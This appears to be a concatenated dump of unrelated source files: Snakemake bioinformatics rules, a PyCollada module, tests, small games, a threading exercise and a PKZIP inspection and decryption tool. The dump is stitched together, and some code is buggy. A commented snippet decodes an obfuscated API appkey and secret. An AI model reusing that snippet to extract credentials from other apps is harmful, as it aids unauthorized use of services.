db_tsv=mmseqs2_tsv,
query_db='queryDB',
query_lca_db='queryLcaDB',
query_lca_tsv='queryLca.tsv'
shadow: 'shallow'
threads: ALL_CORES
resources: mem=190
benchmark: repeat('benchmark/{seq}/mmseqs2.{db}.tsv', 2)
run:
if benchmark_i == 0:
shell('{DROPCACHE}')
else:
shell('rm {params.query_lca_db} {params.query_db}')
shell(MMSEQS2_SHELL, bench_record=bench_record)
rule mmseqs2_report:
input: data='data/{seq}.mmseqs2.{db}.tsv.gz',
total_reads='info/{seq}.total_reads.txt'
output: 'reports/{seq}.mmseqs2.{db}.tsv'
params: db=config['TAXONOMY_DB']
shell:
'''
metax mmseqs-report {input.data} {output} --total-reads $(cat {input.total_reads}) --tax-dir {params.db}
'''
rule mmseqs2_refseqc_db:
input: faa='db/refseqc/fasta/protein.uniq.faa.gz',
prot=join(TAXONOMY_DB, 'accession2taxid', 'prot.accession2taxid.gz'),
dead_prot=join(TAXONOMY_DB, 'accession2taxid', 'dead_prot.accession2taxid.gz')
output: db='db/refseqc/mmseqs2/refseqc.db'
params: tax_db=config['TAXONOMY_DB'],
dir='db/refseqc/mmseqs2'
benchmark: 'benchmark/db/mmseqs2/refseqc.tsv'
log: time='time/db/mmseqs2/refseqc.log'
run:
shell('''\
/usr/bin/time -v -o {log.time} \
{MMSEQS2} createdb {input.faa} {params.dir}/refseqc.db
''', bench_record=bench_record)
# shell('''
# metax create-mmseqs-taxonomy -o {params.dir}/refseqc.tsv --tax-db {TAXONOMY_DB} --accession2taxid {input.prot} {input.dead_prot} -- {params.dir}/refseqc.db_h
# ''')
|
996,135 | 64f254d13d39f8c587cc82e7ad06198b4361a0a4 | ####################################################################
# #
# THIS FILE IS PART OF THE PyCollada LIBRARY SOURCE CODE. #
# USE, DISTRIBUTION AND REPRODUCTION OF THIS LIBRARY SOURCE IS #
# GOVERNED BY A BSD-STYLE SOURCE LICENSE INCLUDED WITH THIS SOURCE #
# IN 'COPYING'. PLEASE READ THESE TERMS BEFORE DISTRIBUTING. #
# #
# THE PyCollada SOURCE CODE IS (C) COPYRIGHT 2009 #
# by Scopia Visual Interfaces Systems http://www.scopia.es/ #
# #
####################################################################
"""Module for <geometry> data loading."""
from lxml import etree as ElementTree
import numpy
import source
import triangleset
import lineset
import polylist
from collada import DaeObject, DaeIncompleteError, DaeBrokenRefError, \
DaeMalformedError, DaeUnsupportedError, tag
class Geometry( DaeObject ):
"""A class containing the data coming from a COLLADA <geometry> tag"""
# TODO: poner el id como argumento
def __init__(self, sources, sourcebyid, vertexsource, primitives, xmlnode=None):
"""Create a geometry instance
:Parameters:
sources
A list of data sources (source.Source)
sourcebyid
A dictionary mapping source ids to the actual objects
vertexsource
A string selecting one of the sources as vertex source
primitives
List of primitive objects contained
xmlnode
When loaded, the xmlnode it comes from
"""
self.sources = sources
"""Source list inside this geometry tag."""
self.sourceById = sourcebyid
"""Sources indexed by id."""
self.vertexsource = vertexsource
"""The source id used as vertex list."""
self._primitives = primitives
if xmlnode != None:
self.xmlnode = xmlnode
self.id = xmlnode.get('id')
else:
self.id = gid or 'geometry' + str(id(self))
self.xmlnode = ElementTree.Element('geometry')
mesh = ElementTree.Element('mesh')
self.xmlnode.append( mesh )
for source in sources:
mesh.append( source.xmlnode )
vxml = ''
for semantic, source in self.sourceById[self.vertexsource].items():
vxml.append('<input semantic="%s" source="#%s" />' % (semantic, source.id))
vxml = '<vertices id="%s">%s</vertices>' % (self.vertexsource, vxml)
mesh.append( ElementTree.fromstring(vxml) )
for tset in _primitives:
mesh.append(tset.xmlnode)
primitives = property( lambda s: tuple(s._primitives) )
"""Primitive object list inside this geometry."""
@staticmethod
def load( collada, localscope, node ):
meshnode = node.find(tag('mesh'))
if meshnode is None: raise DaeUnsupportedError('Unknown geometry node')
sourcebyid = {}
sources = []
sourcenodes = node.findall('%s/%s'%(tag('mesh'), tag('source')))
for sourcenode in sourcenodes:
ch = source.Source.load(collada, {}, sourcenode)
sources.append(ch)
sourcebyid[ch.id] = ch
_primitives = []
vertexsource = None
for subnode in meshnode:
if subnode.tag == tag('vertices'):
inputnodes = {}
for inputnode in subnode.findall(tag('input')):
semantic = inputnode.get('semantic')
inputsource = inputnode.get('source')
if not semantic or not inputsource or not inputsource.startswith('#'):
raise DaeIncompleteError('Bad input definition inside vertices')
inputnodes[semantic] = sourcebyid.get(inputsource[1:])
if (not subnode.get('id') or len(inputnodes)==0 or
not 'POSITION' in inputnodes):
raise DaeIncompleteError('Bad vertices definition in mesh')
sourcebyid[subnode.get('id')] = inputnodes
vertexsource = subnode.get('id')
elif subnode.tag == tag('polylist'):
_primitives.append( polylist.PolygonList.load( collada, sourcebyid, subnode ) )
elif subnode.tag == tag('triangles'):
_primitives.append( triangleset.TriangleSet.load( collada, sourcebyid, subnode ) )
elif subnode.tag == tag('lines'):
_primitives.append( lineset.LineSet.load( collada, sourcebyid, subnode ) )
elif subnode.tag != tag('source'):
raise DaeUnsupportedError('Unknown geometry tag %s' % subnode.tag)
geom = Geometry( sources, sourcebyid, vertexsource, _primitives, xmlnode=node )
return geom
def save(self):
#TODO: Update this with new sourceById format
for ch in self.sources: ch.save()
vnode = self.xmlnode.find(tag('mesh')).find(tag('vertices'))
vinput = vnode.find(tag('input'))
vnode.set('id', self.vertexsource)
vinput.set('source', '#'+self.sourceById[self.vertexsource].id)
for t in self._primitives: t.save()
self.xmlnode.set('id', self.id)
self.xmlnode.set('name', self.id)
def bind(self, matrix, materialnodebysymbol):
"""Create a bound geometry from this one, transform and material mapping"""
return BoundGeometry(self, matrix, materialnodebysymbol)
class BoundGeometry( object ):
"""A geometry bound to a transform matrix and materials mapping."""
def __init__(self, geom, matrix, materialnodebysymbol):
"""Create a bound geometry from a geometry, transform and material mapping"""
self.matrix = matrix
self.materialnodebysymbol = materialnodebysymbol
self._primitives = geom._primitives
self.original = geom
def __len__(self): return len(self._primitives)
def primitives(self):
"""Iterate through all the primitives inside the geometry."""
for p in self._primitives:
boundp = p.bind( self.matrix, self.materialnodebysymbol )
yield boundp
|
996,136 | 3c98eab30e8eea90dbcc6fec12d34d558805983e | # import hashlib
#
# str_start = '123546'
# print(str_start.isdigit())
#
# import re
#
# start = 'av123456'
# print(re.search(r'^av(\d+)/*', start).group(1))
#
# title = '"U::::u/\ib?\\di*."<>|'
# print(re.sub(r'[\/\\:*?"<>|.]', '', title))
#
# entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'
# appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')
#
# print(appkey, sec)
#
# print(''.join([chr(ord(i) + 2) for i in entropy[::-1]]))
# item = []
# for i in entropy[::-1]:
# item.append(chr(ord(i) + 2))
#
# print(''.join(item).split(":"))
#
# appkey = 1
# cid = 2
# quality = 3
# params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, quality, quality)
# print(params)
# chksum = hashlib.md5(bytes(params + sec, 'utf8')).hexdigest()
# print(chksum)
"""
import sys
import urllib
print(sys.path[1])
import os
print(os.getcwd())
title='慢慢喜欢你1'
path=os.path.join(os.getcwd(),'bilibili_video1',title)
print(path)
print(os.path.exists(path))
# os.makedirs(path)
"""
"""
进度条...
@blocknum #数据块数
@blocksize #单个数据块大小
@totalsize #总共数据大小
"""
# while True:
# try:
# x=int(input('输入数字'))
# break
# except ValueError:
# print('输入错误')
# from http.cookiejar import CookieJar
from http.cookiejar import MozillaCookieJar
from urllib import request
from urllib.parse import urlencode
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
}
CookieJar = MozillaCookieJar('cookie.txt')
hander = request.HTTPCookieProcessor(CookieJar)
opener = request.build_opener(hander)
data={
}
login_url='http://www.baidu.com'
req=request.Request(login_url,data=urlencode(data).encode('utf-8'),headers=headers)
opener.open(req)
CookieJar.save(ignore_discard=True)
str='中国 大学'
if str.startswith('中国'):
print(str.replace('中国','').strip())
list_info=['python','c++','java','csharp']
for index,info in enumerate(list_info):
print(index,info)
|
996,137 | 43f5df5fea4dcda79c9ae33bb7212b6216786900 | from __future__ import print_function
from .common import IsolatedTestCase
from .. import (
ECentroidDoesNotExist,
ECentroidAlreadyExists
)
class TestCentroidCrud(IsolatedTestCase):
def test_centroid_creation_1(self):
self.client.create_centroid('centroid-1')
centroids = self.client.list_all_centroids().centroids
self.assertEqual(['centroid-1'], centroids)
def test_centroid_creation_deletion(self):
self.client.create_centroid('centroid-1')
centroids = self.client.list_all_centroids().centroids
self.assertEqual(['centroid-1'], centroids)
self.client.create_centroid('centroid-2')
self.client.create_centroid('centroid-3')
centroids = self.client.list_all_centroids().centroids
self.assertEqual(set(['centroid-1', 'centroid-2', 'centroid-3']), set(centroids))
self.client.delete_centroid('centroid-2')
centroids = self.client.list_all_centroids().centroids
self.assertEqual(set(['centroid-1', 'centroid-3']), set(centroids))
def test_centroid_creation_already_exists(self):
self.client.create_centroid('centroid-1')
with self.assertRaises(ECentroidAlreadyExists):
self.client.create_centroid('centroid-1')
def test_centroid_deletion_does_not_exist(self):
with self.assertRaises(ECentroidDoesNotExist):
self.client.delete_centroid('centroid-1')
|
996,138 | 2e70ae92c432285dfd7cd3bdfc2f01e6498c64a0 | from random import choice
again = 1
total_guesses = 0
correct_guesses = 0
while int(again) > 0:
inpt = input("Input your prediction for the face of the dice\n")
otpt = choice(['1','2','3','4','5','6'])
print(otpt)
if (inpt == otpt):
print("You Guessed it Correctly")
total_guesses += 1
correct_guesses += 1
else:
print("You Guessed it Wrong")
total_guesses += 1
print("Total Guesses are " + str(total_guesses) +
" and correct guesses are " + str(correct_guesses))
again = input("Input 1 to play again and 0 to stop\n")
|
996,139 | 9cecea3e1f4afb37ffc1efff6bb1ce3462e51942 | #!/usr/local/bin/python3
"""
Analyze PKZIP file contents
* scan entire file for PKxy headers
* do quick scan by locating EOF header
* can operate on .zip files from a http://URL
(C) 2016 Willem Hengeveld <itsme@xs4all.nl>
"""
from __future__ import division, print_function, absolute_import, unicode_literals
import sys
import os
import binascii
import struct
import datetime
import zlib
import itertools
if sys.version_info[0] == 2:
import scandir
os.scandir = scandir.scandir
def zip_decrypt(data, pw):
"""
INPUT: data - an array of bytes
pw - either a tuple of 3 dwords, or a byte array.
OUTPUT: a decrypted array of bytes.
The very weak 'zip' encryption
This encryption can be cracked using tools like pkcrack.
Pkcrack does a known plaintext attack, requiring 13 bytes of plaintext.
"""
def make_crc_tab(poly):
def calcentry(v, poly):
for _ in range(8):
v = (v>>1) ^ (poly if v&1 else 0)
return v
return [ calcentry(byte, poly) for byte in range(256) ]
crctab = make_crc_tab(0xedb88320)
def crc32(crc, byte):
return crctab[(crc^byte)&0xff] ^ (crc>>8)
def updatekeys(keys, byte):
keys[0] = crc32(keys[0], byte)
keys[1] = ((keys[1] + (keys[0]&0xFF)) * 134775813 + 1)&0xFFFFFFFF
keys[2] = crc32(keys[2], keys[1]>>24)
keys = [ 0x12345678, 0x23456789, 0x34567890 ]
if type(pw)==list:
keys = pw
else:
for c in pw:
updatekeys(keys, c)
for blk in data:
u = bytearray()
for b in bytearray(blk):
xor = (keys[2] | 2)&0xFFFF
xor = ((xor * (xor^1))>>8) & 0xFF
b = b ^ xor
u.append(b)
updatekeys(keys, b)
yield u
def skipbytes(blks, skip, args):
"""
skip the first <skip> bytes of a stream of byte blocks.
"""
skipped = b''
for blk in blks:
if skip >= len(blk):
skip -= len(blk)
skipped += blk
elif skip:
skipped += blk[:skip]
if args.verbose:
print("CRYPTHEADER: %s" % binascii.b2a_hex(skipped))
sys.stdout.flush()
yield blk[skip:]
skip = 0
else:
yield blk
def decode_name(name):
nonprint = set('\u0009\u000b\u000c\u001c\u001d\u001e\u001f\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2008\u2009\u200a\u2028\u2029\u205f\u3000')
try:
utf8 = name.decode('utf-8', 'strict')
if not nonprint & set(utf8) and utf8.isprintable():
return utf8
except:
pass
return "hex-%s" % binascii.b2a_hex(name)
class EntryBase(object):
""" base class for PK headers """
def loaditems(self, fh):
""" loads any items refered to by the header """
pass
def decodedatetime(ts):
def decode_date(dt):
if dt==0:
return datetime.datetime(1980,1,1)
year, mon, day = (dt>>9), (dt>>5)&15, dt&31
try:
return datetime.datetime(year+1980, mon, day)
except Exception as e:
print("error decoding date %d-%d-%d" % (year+1980, mon, day))
return datetime.datetime(1980,1,1)
def decode_time(tm):
hour, minute, bisecond = tm>>11, (tm>>5)&63, tm&31
return datetime.timedelta(hours=hour, minutes=minute, seconds=bisecond*2)
return decode_date(ts>>16) + decode_time(ts & 0xFFFF)
######################################################
# Decoder classes
######################################################
class CentralDirEntry(EntryBase):
HeaderSize = 42
MagicNumber = b'\x01\x02'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.createVersion, self.neededVersion, self.flags, self.method, self.timestamp, \
self.crc32, self.compressedSize, self.originalSize, self.nameLength, self.extraLength, \
self.commentLength, self.diskNrStart, self.zipAttrs, self.osAttrs, self.dataOfs = \
struct.unpack_from("<4H4L5HLL", data, ofs)
ofs += self.HeaderSize
self.nameOffset = baseofs + ofs
ofs += self.nameLength
self.extraOffset = baseofs + ofs
ofs += self.extraLength
self.commentOffset = baseofs + ofs
ofs += self.commentLength
self.endOffset = baseofs + ofs
self.name = None
self.extra = None
self.comment = None
def loaditems(self, fh):
fh.seek(self.nameOffset)
self.name = decode_name(fh.read(self.nameLength))
fh.seek(self.extraOffset)
self.extra = fh.read(self.extraLength)
fh.seek(self.commentOffset)
self.comment = fh.read(self.commentLength).decode("utf-8", "ignore")
def summary(self):
def flagdesc(fl):
if fl&64: return "AES"
if fl&1: return "CRYPT"
return ""
return "%10d (%5.1f%%) %s %08x [%5s] %s" % (
self.originalSize,
100.0*self.compressedSize/self.originalSize if self.originalSize else 0,
decodedatetime(self.timestamp),
self.crc32,
flagdesc(self.flags),
self.name
)
def __repr__(self):
r = "PK.0102: %04x %04x %04x %04x %08x %08x %08x %08x %04x %04x %04x %04x %04x %08x %08x | %08x %08x %08x %08x" % (
self.createVersion, self.neededVersion, self.flags, self.method, self.timestamp,
self.crc32, self.compressedSize, self.originalSize, self.nameLength, self.extraLength,
self.commentLength, self.diskNrStart, self.zipAttrs, self.osAttrs, self.dataOfs,
self.nameOffset, self.extraOffset, self.commentOffset, self.endOffset)
if self.name:
r += " - " + self.name
return r
class LocalFileHeader(EntryBase):
HeaderSize = 26
MagicNumber = b'\x03\x04'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.neededVersion, self.flags, self.method, self.timestamp, self.crc32, \
self.compressedSize, self.originalSize, self.nameLength, self.extraLength = \
struct.unpack_from("<3H4LHH", data, ofs)
ofs += self.HeaderSize
self.nameOffset = baseofs + ofs
ofs += self.nameLength
self.extraOffset = baseofs + ofs
ofs += self.extraLength
self.dataOffset = baseofs + ofs
ofs += self.compressedSize
self.endOffset = baseofs + ofs
self.name = None
self.extra = None
self.data = None
def loaditems(self, fh):
fh.seek(self.nameOffset)
self.name = decode_name(fh.read(self.nameLength))
fh.seek(self.extraOffset)
self.extra = fh.read(self.extraLength)
# not loading data
def __repr__(self):
r = "PK.0304: %04x %04x %04x %08x %08x %08x %08x %04x %04x | %08x %08x %08x %08x" % (
self.neededVersion, self.flags, self.method, self.timestamp, self.crc32,
self.compressedSize, self.originalSize, self.nameLength, self.extraLength,
self.nameOffset, self.extraOffset, self.dataOffset, self.endOffset)
if self.name:
r += " - " + self.name
return r
class EndOfCentralDir(EntryBase):
HeaderSize = 18
MagicNumber = b'\x05\x06'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.thisDiskNr, self.startDiskNr, self.thisEntries, self.totalEntries, self.dirSize, self.dirOffset, self.commentLength = \
struct.unpack_from("<4HLLH", data, ofs)
ofs += self.HeaderSize
self.commentOffset = baseofs + ofs
ofs += self.commentLength
self.endOffset = baseofs + ofs
self.comment = None
def loaditems(self, fh):
if not self.commentLength:
return
fh.seek(self.commentOffset)
self.comment = fh.read(self.commentLength)
if self.comment.startswith(b'signed by SignApk'):
self.comment = repr(self.comment[:17]) + str(binascii.b2a_hex(self.comment[18:]), 'ascii')
else:
self.comment = self.comment.decode('utf-8', 'ignore')
def summary(self):
if self.thisEntries==self.totalEntries:
r = "EOD: %d entries" % (self.totalEntries)
else:
r = "Spanned archive %d .. %d ( %d of %d entries )" % (self.startDiskNr, self.thisDiskNr, self.thisEntries, self.totalEntries)
r += ", %d byte directory" % self.dirSize
return r
def __repr__(self):
r = "PK.0506: %04x %04x %04x %04x %08x %08x %04x | %08x %08x" % (
self.thisDiskNr, self.startDiskNr, self.thisEntries, self.totalEntries, self.dirSize, self.dirOffset, self.commentLength,
self.commentOffset, self.endOffset)
return r
class DataDescriptor(EntryBase):
HeaderSize = 12
MagicNumber = b'\x07\x08'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
self.crc, self.compSize, self.uncompSize = \
struct.unpack_from("<3L", data, ofs)
ofs += self.HeaderSize
self.endOffset = baseofs + ofs
def __repr__(self):
return "PK.0708: %08x %08x %08x | %08x" % (
self.crc, self.compSize, self.uncompSize,
self.endOffset)
# todo
class Zip64EndOfDir(EntryBase):
HeaderSize = 0
MagicNumber = b'\x06\x06'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class Zip64EndOfDirLocator(EntryBase):
HeaderSize = 0
MagicNumber = b'\x06\x07'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class ExtraEntry(EntryBase):
HeaderSize = 0
MagicNumber = b'\x06\x08'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class SpannedArchive(EntryBase):
HeaderSize = 0
MagicNumber = b'\x03\x03'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
class ArchiveSignature(EntryBase):
HeaderSize = 0
MagicNumber = b'\x05\x05'
def __init__(self, baseofs, data, ofs):
self.pkOffset = baseofs + ofs - 4
def getDecoderClass(typ):
""" Return Decoder class for the PK type. """
for cls in (CentralDirEntry, LocalFileHeader, EndOfCentralDir, DataDescriptor, Zip64EndOfDir, Zip64EndOfDirLocator, ExtraEntry, SpannedArchive, ArchiveSignature):
if cls.MagicNumber == typ:
return cls
def findPKHeaders(args, fh):
""" Scan the entire file for PK headers. """
def processchunk(o, chunk):
n = -1
while True:
n = chunk.find(b'PK', n+1)
if n == -1 or n+4 > len(chunk):
break
cls = getDecoderClass(chunk[n+2:n+4])
if cls:
hdrEnd = n+4+cls.HeaderSize
if hdrEnd > len(chunk):
continue
# todo: skip entries entirely within repeated chunk
# if n<64 and hdrEnd>64:
# continue
yield cls(o, chunk, n+4)
prev = b''
o = 0
if args.offset:
fh.seek(args.offset, os.SEEK_SET if args.offset >= 0 else os.SEEK_END)
o = args.offset
while args.length is None or o < args.length:
want = args.chunksize
if args.length is not None and want > args.length - o:
want = args.length - o
fh.seek(o)
chunk = fh.read(want)
if len(chunk) == 0:
break
for ch in processchunk(o-len(prev), prev+chunk):
yield ch
# 64 so all header types would fit, exclusive their variable size parts
prev = chunk[-64:]
o += len(chunk)
def quickScanZip(args, fh):
""" Do a quick scan of the .zip file, starting by locating the EOD marker. """
# 100 bytes is the smallest .zip possible
fh.seek(0, 2)
fsize = fh.tell()
if fsize==0:
print("Empty file")
return
if fsize<100:
print("Zip too small: %d bytes, minimum zip is 100 bytes" % fsize)
return
fh.seek(-100, 2)
eoddata = fh.read()
iEND = eoddata.find(b'PK\x05\x06')
if iEND==-1:
# try with larger chunk
ofs = max(fh.tell()-0x10100, 0)
fh.seek(ofs, 0)
eoddata = fh.read()
iEND = eoddata.find(b'PK\x05\x06')
if iEND==-1:
print("expected PK0506 - probably not a PKZIP file")
return
else:
ofs = fh.tell()-0x100
eod = EndOfCentralDir(ofs, eoddata, iEND+4)
yield eod
dirofs = eod.dirOffset
for _ in range(eod.thisEntries):
fh.seek(dirofs)
dirdata = fh.read(46)
if dirdata[:4] != b'PK\x01\x02':
print("expected PK0102")
return
dirent = CentralDirEntry(dirofs, dirdata, 4)
yield dirent
dirofs = dirent.endOffset
def zipraw(fh, ent):
if isinstance(ent, CentralDirEntry):
# find LocalFileHeader
fh.seek(ent.dataOfs)
data = fh.read(4+LocalFileHeader.HeaderSize)
dirent = ent
ent = LocalFileHeader(ent.dataOfs, data, 4)
ent.loaditems(fh)
fh.seek(ent.dataOffset)
nread = 0
while nread < ent.compressedSize:
want = min(ent.compressedSize-nread, 0x10000)
block = fh.read(want)
if len(block)==0:
break
yield block
nread += len(block)
def blockdump(baseofs, blks):
o = baseofs
for blk in blks:
print("%08x: %s" % (o, binascii.b2a_hex(blk)))
o += len(blk)
def zipcat(blks, ent):
if ent.method==8:
C = zlib.decompressobj(-15)
for block in blks:
yield C.decompress(block)
yield C.flush()
elif ent.method==0:
yield from blks
else:
print("unknown compression method")
def namegenerator(name):
yield name
paths = name.rsplit('/', 1)
parts = paths[-1].rsplit('.', 1)
if len(paths)>1:
part0 = "%s/%s" % ("".join(paths[:-1]), parts[0])
else:
part0 = parts[0]
if len(parts)>1:
part1 = ".%s" % (parts[1])
else:
part1 = ""
for i in itertools.count(1):
yield "%s-%d%s" % (part0, i, part1)
def savefile(outdir, name, data):
os.makedirs(os.path.dirname(os.path.join(outdir, name)), exist_ok=True)
for namei in namegenerator(name):
path = os.path.join(outdir, namei)
if not os.path.exists(path):
break
with open(path, "wb") as fh:
fh.writelines(data)
def getbytes(fh, ofs, size):
fh.seek(ofs)
return fh.read(size)
def processfile(args, fh):
""" Process one opened file / url. """
if args.quick:
scanner = quickScanZip(args, fh)
else:
scanner = findPKHeaders(args, fh)
def checkarg(arg, ent):
if not arg:
return False
return '*' in arg or ent.name in arg
def checkname(a, b):
if a and '*' in a: return True
if b and '*' in b: return True
l = 0
if a: l += len(a)
if b: l += len(b)
return l > 1
if args.verbose and not (args.cat or args.raw or args.save):
print(" 0304 need flgs mth stamp --crc-- compsize fullsize nlen xlen namofs xofs datofs endofs")
print(" 0102 crea need flgs mth stamp --crc-- compsize fullsize nlen xlen clen dsk0 attr osattr datptr namofs xofs cmtofs endofs")
for ent in scanner:
if args.cat or args.raw or args.save:
if args.quick and isinstance(ent, CentralDirEntry) or \
not args.quick and isinstance(ent, LocalFileHeader):
ent.loaditems(fh)
do_cat = checkarg(args.cat, ent)
do_raw = checkarg(args.raw, ent)
do_save= checkarg(args.save, ent)
do_name= checkname(args.cat, args.raw)
if do_name:
print("\n===> " + ent.name + " <===\n")
sys.stdout.flush()
blks = zipraw(fh, ent)
if args.password and ent.flags&1:
blks = zip_decrypt(blks, args.password)
if do_cat or do_save:
blks = skipbytes(blks, 12, args)
if do_cat:
sys.stdout.buffer.writelines(zipcat(blks, ent))
if do_raw:
sys.stdout.buffer.writelines(blks)
if do_save:
savefile(args.outputdir, ent.name, zipcat(blks, ent))
else:
ent.loaditems(fh)
if args.verbose or not args.quick:
print("%08x: %s" % (ent.pkOffset, ent))
else:
print(ent.summary())
if hasattr(ent, "comment") and ent.comment and not args.dumpraw:
print(ent.comment)
if args.dumpraw and hasattr(ent, "extraLength") and ent.extraLength:
print("%08x: XTRA: %s" % (ent.extraOffset, binascii.b2a_hex(getbytes(fh, ent.extraOffset, ent.extraLength))))
if args.dumpraw and hasattr(ent, "comment") and ent.comment:
print("%08x: CMT: %s" % (ent.commentOffset, binascii.b2a_hex(getbytes(fh, ent.commentOffset, ent.commentLength))))
if args.dumpraw and isinstance(ent, LocalFileHeader):
blks = zipraw(fh, ent)
if args.password and ent.flags&1:
blks = zip_decrypt(blks, args.password)
blockdump(ent.dataOffset, blks)
def DirEnumerator(args, path):
"""
Enumerate all files / links in a directory,
optionally recursing into subdirectories,
or ignoring links.
"""
for d in os.scandir(path):
try:
if d.name == '.' or d.name == '..':
pass
elif d.is_symlink() and args.skiplinks:
pass
elif d.is_file():
yield d.path
elif d.is_dir() and args.recurse:
for f in DirEnumerator(args, d.path):
yield f
except Exception as e:
print("EXCEPTION %s accessing %s/%s" % (e, path, d.name))
def EnumeratePaths(args, paths):
"""
Enumerate all urls, paths, files from the commandline
optionally recursing into subdirectories.
"""
for fn in paths:
try:
# 3 - for ftp://, 4 for http://, 5 for https://
if fn.find("://") in (3,4,5):
yield fn
if os.path.islink(fn) and args.skiplinks:
pass
elif os.path.isdir(fn) and args.recurse:
for f in DirEnumerator(args, fn):
yield f
elif os.path.isfile(fn):
yield fn
except Exception as e:
print("EXCEPTION %s accessing %s" % (e, fn))
def main():
import argparse
parser = argparse.ArgumentParser(description='zipdump - scan file contents for PKZIP data',
epilog='zipdump can quickly scan a zip from an URL without downloading the complete archive')
parser.add_argument('--verbose', '-v', action='count')
parser.add_argument('--quiet', action='store_true')
parser.add_argument('--cat', '-c', nargs='*', type=str, help='decompress file(s) to stdout')
parser.add_argument('--raw', '-p', nargs='*', type=str, help='print raw compressed file(s) data to stdout')
parser.add_argument('--save', '-s', nargs='*', type=str, help='extract file(s) to the output directory')
parser.add_argument('--outputdir', '-d', type=str, help='the output directory, default = curdir', default='.')
parser.add_argument('--quick', '-q', action='store_true', help='Quick dir scan. This is quick with URLs as well.')
parser.add_argument('--recurse', '-r', action='store_true', help='recurse into directories')
parser.add_argument('--skiplinks', '-L', action='store_true', help='skip symbolic links')
parser.add_argument('--offset', '-o', type=int, help='start processing at offset')
parser.add_argument('--length', '-l', type=int, help='max length of data to process')
parser.add_argument('--chunksize', type=int, default=1024*1024)
parser.add_argument('--dumpraw', action='store_true', help='hexdump raw compressed data')
parser.add_argument('--password', type=str, help="Password for pkzip decryption")
parser.add_argument('--hexpassword', type=str, help="hexadecimal password for pkzip decryption")
parser.add_argument('--keys', type=str, help="internal key representation for pkzip decryption")
parser.add_argument('FILES', type=str, nargs='*', help='Files or URLs')
args = parser.parse_args()
use_raw = args.cat or args.raw or args.save
if args.hexpassword:
args.password = binascii.a2b_hex(args.hexpassword)
elif args.keys:
args.password = list(int(_, 0) for _ in args.keys.split(","))
elif args.password:
args.password = args.password.encode('utf-8')
if args.FILES:
for fn in EnumeratePaths(args, args.FILES):
if len(args.FILES)>1 and not args.quiet:
print("\n==> " + fn + " <==\n")
try:
if fn.find("://") in (3,4,5):
# when argument looks like a url, use urlstream to open
import urlstream
with urlstream.open(fn) as fh:
processfile(args, fh)
else:
with open(fn, "rb") as fh:
processfile(args, fh)
except Exception as e:
print("ERROR: %s" % e)
raise
else:
processfile(args, sys.stdin.buffer)
if __name__ == '__main__':
main()
|
996,140 | 632d44d0b4624b42f61953d1c08a7adcb74968cf | import threading
class H2O(object):
sema_h = threading.Semaphore
sema_o = threading.Semaphore
lock = threading.Lock
def __init__(self):
self.sema_h = threading.Semaphore(2)
self.sema_o = threading.Semaphore(0)
self.lock = threading.Lock()
def hydrogen(self, releaseHydrogen):
"""
:type releaseHydrogen: method
:rtype: void
"""
# releaseHydrogen() outputs "H". Do not change or remove this line.
self.sema_h.acquire()
releaseHydrogen()
self.sema_o.release()
def oxygen(self, releaseOxygen):
"""
:type releaseOxygen: method
:rtype: void
"""
self.lock.acquire(True)
self.sema_o.acquire()
self.sema_o.acquire()
self.lock.release()
# releaseOxygen() outputs "O". Do not change or remove this line.
releaseOxygen()
self.sema_h.release()
self.sema_h.release()
def releaseOxygen():
print "O"
def releaseHydrogen():
print "H"
a = H2O()
# s = "OHOHOOHHOHHOOHHHHOOHOOHHOHHOOHHHOOHOHHOHHOHHHHHOHHHHHHHHHHHH"
s = "OOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHHHHHHHHHHHHHHHHHHHH"
for i in s:
if i == "H":
threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
else:
threading.Thread(target=a.oxygen, args=[releaseOxygen]).start()
# threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
# threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
# threading.Thread(target=a.hydrogen, args=[releaseHydrogen]).start()
# threading.Thread(target=a.oxygen, args=[releaseOxygen]).start()
|
996,141 | 1f12700b1abc97218bed3171ec9708c5d284243f | # Sprite classes for platform game
import pygame as pg
from settings import *
import random
vec = pg.math.Vector2
class Player(pg.sprite.Sprite):
def __init__(self, game, bird_sprites):
pg.sprite.Sprite.__init__(self)
self.game = game
self.bird_sprites = bird_sprites
self.sprite_frame = 0
self.image_orig = self.bird_sprites[self.sprite_frame]
self.image = self.image_orig
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.center = (WIDTH / 2, HEIGHT / 2)
self.pos = vec(15, HEIGHT / 2)
self.vel = vec(0, 0)
self.acc = vec(0, 0)
#Rotation
self.rot = 0 # rotation degree
self.last_update = pg.time.get_ticks()
def jump(self):
if self.pos.y > 25:
self.vel.y = -PLAYER_JUMP
def update(self):
# self.rotate()
self.animate()
self.rotate()
self.acc = vec(0, PLAYER_GRAV)
"""keys = pg.key.get_pressed()
if keys[pg.K_LEFT]:
self.acc.x = -PLAYER_ACC
if keys[pg.K_RIGHT]:
self.acc.x = PLAYER_ACC"""
self.acc.x = PLAYER_ACC
# apply friction
self.acc.x += self.vel.x * PLAYER_FRICTION
# equations of motion
self.vel += self.acc
